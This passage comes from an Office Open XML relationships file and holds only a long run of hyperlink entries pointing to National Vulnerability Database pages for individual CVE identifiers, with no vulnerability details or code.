Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27690" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27962" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33186" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39830" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39832" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41869" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42044" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42508" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42579" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42584" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45100" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45537" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45764" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47702" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48024" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48031" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48039" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48162" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49364" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49441" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49849" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50152" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51346" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52723" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52766" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53793" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53939" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55247" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55248" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55511" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55536" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55640" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57499" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58400" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61800" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62646" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62862" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67593" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67598" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69641" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70452" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73069" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73253" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73256" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73257" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73309" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73311" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73312" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73475" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75156" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75160" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75340" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75431" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75595" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75746" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77337" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78327" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78328" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78361" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79571" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80164" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80181" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80424" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81468" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81939" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84939" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85043" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85184" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86729" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86840" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87806" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88007" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88044" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89043" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89086" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-54603" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10090" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53581" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62988" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66768" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67403" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68484" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69251" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69253" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71851" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73302" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73407" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73842" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82021" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85982" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86259" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87613" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87911" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-30156" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21441" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30864" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44432" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47746" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48019" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50093" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5598" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5706" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61666" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72772" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79921" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82866" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86165" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-52251" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-20701" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-56798" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-67030" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70151" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-9049" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12648" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12651" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13622" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13739" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13761" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14359" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14828" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16101" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16502" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16745" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-1784" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18198" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18341" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18480" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18486" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18617" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18851" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19291" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19292" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19293" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19298" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19546" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19633" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19887" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21092" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27140" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27606" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28609" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28618" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28666" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30754" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31936" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32590" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33001" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33240" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39944" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40858" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41870" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42016" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43112" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44829" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4601" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48050" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48054" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49050" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49221" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49228" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49255" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49467" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49473" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49879" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49882" TargetMode="External" Id="rId787" /><Relationship 